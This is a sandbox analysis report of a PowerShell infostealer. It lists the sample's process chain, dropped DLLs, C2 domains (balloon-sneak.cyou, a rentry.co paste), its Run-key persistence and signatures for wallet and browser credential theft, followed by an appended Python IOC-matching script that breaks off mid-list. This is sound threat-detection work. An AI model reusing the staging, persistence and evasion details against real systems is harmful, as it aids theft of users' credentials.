Behavior Graph ID: 1565310 | Sample: bUAmCazc.ps1 | Startdate: 29/11/2024 | Architecture: WINDOWS | Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
Contacted hosts: rentry.co (Connects to a pastebin service (likely for C&C)); balloon-sneak.cyou

Process tree (numbers after a process name are the counts shown next to it in the graph):

powershell.exe 1 226 (started)
    Dropped: C:\Users\user\AppData\...\python27.dll, PE32; C:\Users\user\AppData\Roaming\...\config.prx, PE32; C:\Users\user\AppData\...\UpdateCommon.dll, PE32; 9 other files (8 malicious)
    Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module; Powershell drops PE file
    Setup.exe 8 (started)
        Dropped: C:\Users\user\AppData\...\python27.dll, PE32; C:\Users\user\AppData\Roaming\...\msvcr90.dll, PE32; C:\Users\user\AppData\Roaming\...\Setup.exe, PE32+
        Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Query firmware table information (likely to detect VMs); Maps a DLL or memory area into another process; 3 other signatures
        more.com 2 (started)
            Dropped: C:\Users\user\AppData\Local\Temp\eqoamnqfg, PE32
            Signatures: Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
            msiexec.exe 1 (started)
                Network: balloon-sneak.cyou 172.67.170.85, 443, 49736, 49737 CLOUDFLARENETUS United States; rentry.co 104.26.2.16, 443, 49806 CLOUDFLARENETUS United States
                Dropped: C:\Users\user\...\B03VAGDV27AOWCK1I.ps1, HTML
                Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures
                powershell.exe 7 (started)
                    conhost.exe (started)
            conhost.exe (started)
        Setup.exe (started)
    conhost.exe (started)
Setup.exe (started)
    Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Query firmware table information (likely to detect VMs); Found direct / indirect Syscall (likely to bypass EDR)
rundll32.exe (started)

Source | Detection | Scanner | Label
bUAmCazc.ps1 | 16% | ReversingLabs | Script-PowerShell.Trojan.Powdow

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\eqoamnqfg | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Driver\msvcr90.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Driver\python27.dll | 8% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll | 8% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://chromedevtools.github.io/devtools-protocol/tot/$0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/_(0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/api0%Avira URL Cloudsafe
              http://myserver.corp.contoso.com/0%Avira URL Cloudsafe
              https://balloon-sneak.cyou:443/api0%Avira URL Cloudsafe
              https://www.chromestatus.com/feature/56297098240327680%Avira URL Cloudsafe
              https://balloon-sneak.cyou/apiP0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/apim0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              rentry.co
              104.26.2.16
              truefalse
                high
                balloon-sneak.cyou
                172.67.170.85
                truetrue
                  unknown
Name | Malicious | Antivirus Detection | Reputation
https://balloon-sneak.cyou/api | true | Avira URL Cloud: safe | unknown
https://rentry.co/feouewe5/raw | false |  | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://repository.certum.pl/ctsca2021.cer0A | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crl.certum.pl/ctsca2021.crl0o | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://duckduckgo.com/ac/?q= | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.vmware.com/0 | Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://crl.microsoft | msiexec.exe, 0000000B.00000003.2506550494.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033F9000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://chromedevtools.github.io/devtools-protocol/tot/$ | devtools_resources.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://developers.google.com/web/tools/chrome-devtools/network/?utm_source=devtools&utm_campaign=20 | devtools_resources.pak.0.dr | false |  | high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://ocsp.digicert.c | Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://developers.google.com/web/tools/lighthouse/ | devtools_resources.pak.0.dr | false |  | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://developers.google.com/web/fundamentals/accessibility/accessible-styles#color_and_contrast | devtools_resources.pak.0.dr | false |  | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | msiexec.exe, 0000000B.00000003.2262938227.0000000005F4F000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263146054.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2302839123.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263003093.0000000005F48000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://contoso.com/rdweb/Feed/webfeed.aspx. | powershell.exe, 00000000.00000002.1992948747.000001AD675A7000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://balloon-sneak.cyou/_( | msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://developers.google.com/web/tools/chrome-devtools/ | devtools_resources.pak.0.dr | false |  | high
https://support.google.com/chrome/?p=datasaver | devtools_resources.pak.0.dr | false |  | high
https://rentry.co/feouewe5/rawZ | msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://github.com/WICG/webpackage | devtools_resources.pak.0.dr | false |  | high
https://aka.ms/pscore6lB | powershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://subca.ocsp-certum.com05 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://x1.c.lencr.org/0 | msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://x1.i.lencr.org/0 | msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | msiexec.exe, 0000000B.00000003.2263003093.0000000005F23000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://subca.ocsp-certum.com02 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://docs.google.com/forms/d/e/1FAIpQLSchz2FdcQ-rRllzl8BbhWaTRRY-12BpPjW6Hr9e1-BpCA083w/viewform | devtools_resources.pak.0.dr | false |  | high
http://subca.ocsp-certum.com01 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crl.certum.pl/ctnca2.crl0l | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://repository.certum.pl/ctnca2.cer09 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://developers.google.com/chrome-developer-tools/docs/remote-debugging | devtools_resources.pak.0.dr | false |  | high
https://nodejs.org/static/images/logos/nodejs-new-pantone-black.png | devtools_resources.pak.0.dr | false |  | high
https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/?utm_source=devtoo | devtools_resources.pak.0.dr | false |  | high
https://support.mozilla.org/products/firefoxgro.all | msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.certum.pl/CPS0 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://python.org/dev/peps/pep-0263/ | Setup.exe, 0000000C.00000002.2211304501.000000006AE0A000.00000002.00000001.01000000.0000000A.sdmp | false |  | high
http://myserver.corp.contoso.com/ | nca.adml.0.dr | false | Avira URL Cloud: safe | unknown
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://chrome-devtools-frontend.appspot.com | devtools_resources.pak.0.dr | false |  | high
http://repository.certum.pl/ctnca.cer09 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crl.certum.pl/ctnca.crl0k | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://developers.google.com/web/tools/chrome-devtools/sources?utm_source=devtools&utm_campaign=201 | devtools_resources.pak.0.dr | false |  | high
http://crl3.digicer | Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://balloon-sneak.cyou/ | msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2396539697.0000000005EFF000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506550494.00000000033FC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.vmware.com/0/ | Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://rentry.co/e | msiexec.exe, 0000000B.00000002.2580282480.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://ocsp.rootca1.amazontrust.com0: | msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://balloon-sneak.cyou:443/api | msiexec.exe, 0000000B.00000003.2506746140.00000000033A3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | msiexec.exe, 0000000B.00000003.2262938227.0000000005F4F000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263146054.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2302839123.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263003093.0000000005F48000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://www.certum.pl/CPS0 | powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.ecosia.org/newtab/ | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://c0rl.m%L | Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.symauth.com/cps0( | Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmp | false |  | high
https://developers.google.com/web/tools/lighthouse/) | devtools_resources.pak.0.dr | false |  | high
https://nodejs.org/en/docs/inspector/ | devtools_resources.pak.0.dr | false |  | high
https://www.chromestatus.com/feature/5629709824032768 | devtools_resources.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.symauth.com/rpa00 | Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://rentry.co/ | msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://balloon-sneak.cyou/apiP | msiexec.exe, 0000000B.00000003.2571882490.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580443477.000000000341F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.microsof | msiexec.exe, 0000000B.00000003.2262938227.0000000005F51000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.info-zip.org/ | Setup.exe, 00000003.00000002.1937686145.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.000000000505D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002D75000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://developers.google.com | devtools_resources.pak.0.dr | false |  | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://developers.google.com/web/tools/chrome-devtools/progressive-web-apps#opaque-responses | devtools_resources.pak.0.dr | false |  | high
https://balloon-sneak.cyou/apim | msiexec.exe, 0000000B.00000003.2439380728.000000000341F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 0000000B.00000003.2263003093.0000000005F23000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://developer.chrome.com/devtools/docs/remote-debugging#port-forwardingdevtools_resources.pak.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://crl3.dSetup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.2.16 | rentry.co | United States | 13335 | CLOUDFLARENETUS | false
172.67.170.85 | balloon-sneak.cyou | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565310
Start date and time: 2024-11-29 15:44:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: bUAmCazc.ps1
Detection: MAL
Classification: mal100.troj.spyw.evad.winPS1@16/213@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .ps1
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 5544, because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 4144, because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big: too many NtCreateKey calls found
• Report size getting too big: too many NtSetInformationFile calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. View the PCAPs for the complete data.
• VT rate limit hit for: bUAmCazc.ps1
Time | Type | Description
09:45:10 | API Interceptor | 44x Sleep call for process: powershell.exe modified
09:45:24 | API Interceptor | 2x Sleep call for process: Setup.exe modified
09:45:52 | API Interceptor | 9x Sleep call for process: msiexec.exe modified
14:45:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
14:45:38 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
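Two groups of indicators in the tables above are the ones worth turning into a check: the contacted hosts (balloon-sneak.cyou, which the IP table marks malicious even though its URL entry carries an Avira verdict of "safe" and a reputation of "unknown", and rentry.co, the pastebin-style service used for the first stage) and the persistence entry (Run value NetUtilityApp pointing at C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe). The Python below is an added example and is not part of the Joe Sandbox report: it matches those indicators against constructed Run-key entries and DNS/proxy log lines. Two things in it are my assumptions rather than report content: the shape of the registry tuples and log lines is invented, and the rule that flags any Run target under AppData\Roaming generalizes what this one sample does. Both IP addresses are deliberately kept informational: they belong to AS13335 (Cloudflare), and 104.26.2.16 also appears for an unrelated site in the similar-sample tables, so an address match needs confirmation from the TLS SNI or HTTP Host header before anyone blocks on it.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

# Network IOCs taken from this report: the C2 host that Joe Sandbox marks
# malicious and the pastebin-style service contacted for the first stage.
C2_DOMAINS = {"balloon-sneak.cyou", "rentry.co"}

# Both contacted IPs sit in AS13335 (Cloudflare) and are shared edge
# addresses, so they are recorded for context only and never blocked on.
SHARED_EDGE_IPS = {"104.26.2.16", "172.67.170.85"}

# Persistence IOC from the report: the Run value name written by the sample.
RUN_VALUE_NAME = "NetUtilityApp"


@dataclass(frozen=True)
class Hit:
    kind: str      # "runkey", "network" or "info"
    evidence: str  # the registry entry or log line that fired
    reason: str


# Assumed heuristic (not stated in the report): a Run value whose target
# lives under the per-user AppData\Roaming tree deserves a look, because
# that is where this sample stages its copy.
_ROAMING = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)


def check_run_entries(entries: Iterable[tuple[str, str, str]]) -> list[Hit]:
    """entries: (registry key, value name, command line) tuples."""
    hits: list[Hit] = []
    for key, name, cmd in entries:
        where = f"{key}\\{name} = {cmd}"
        if name == RUN_VALUE_NAME:
            hits.append(Hit("runkey", where, "value name matches report IOC"))
        elif _ROAMING.search(cmd):
            hits.append(Hit("runkey", where, "autostart target under AppData\\Roaming"))
    return hits


# Pulls dotted host names (final label alphabetic) out of free-form log lines.
_HOST = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.IGNORECASE)


def _is_ioc_host(host: str) -> bool:
    h = host.lower().rstrip(".")
    return h in C2_DOMAINS or any(h.endswith("." + d) for d in C2_DOMAINS)


def check_network_log(lines: Iterable[str]) -> list[Hit]:
    hits: list[Hit] = []
    for raw in lines:
        line = raw.strip()
        ioc_hosts = [h for h in _HOST.findall(line) if _is_ioc_host(h)]
        if ioc_hosts:
            hits.append(Hit("network", line, f"host {ioc_hosts[0].lower()} is a report IOC"))
            continue
        # No IOC host on the line: an address-only match stays informational,
        # because the address is a Cloudflare edge shared with unrelated sites.
        for ip in SHARED_EDGE_IPS:
            if re.search(rf"(?<![\d.]){re.escape(ip)}(?![\d.])", line):
                hits.append(Hit("info", line, f"{ip} is a shared Cloudflare edge; confirm by SNI or Host header"))
                break
    return hits


# Constructed sample data (not from the report), in the shape a collector
# might hand back: Run values and a few DNS/proxy log lines.
SAMPLE_RUN_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "NetUtilityApp",
     r"C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r"C:\Users\user\AppData\Roaming\qwerty\svc.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
]

SAMPLE_NET_LOG = [
    "2024-11-29T14:45:12Z dns query rentry.co A -> 104.26.2.16",
    "2024-11-29T14:45:40Z proxy CONNECT balloon-sneak.cyou:443 client=10.0.0.5",
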